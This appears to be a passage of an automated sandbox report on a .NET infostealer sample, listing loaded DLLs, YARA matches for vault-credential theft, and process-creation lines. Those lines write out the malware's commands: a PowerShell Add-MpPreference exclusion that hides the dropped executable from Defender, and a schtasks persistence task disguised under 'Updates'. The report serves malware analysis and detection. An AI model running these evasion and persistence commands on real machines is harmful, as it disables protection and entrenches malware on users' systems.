                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dll
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: jYRIGnZlROed.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, fJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, fJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, fJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, fJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, UyDMxsd3t.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, 86A7K.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, vztq.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, B80ITW1.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, uQSn7t.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, bEoUgRL.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, Ol4IUSXbtb4CW66ULT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, Ol4IUSXbtb4CW66ULT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, Ol4IUSXbtb4CW66ULT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@20/11@2/2
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeFile created: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMutant created: \Sessions\1\BaseNamedObjects\vClJnoFCDBholUZVdnmAEEyAlP
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeFile created: C:\Users\user\AppData\Local\Temp\tmp919E.tmpJump to behavior
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeReversingLabs: Detection: 28%
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeVirustotal: Detection: 41%
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
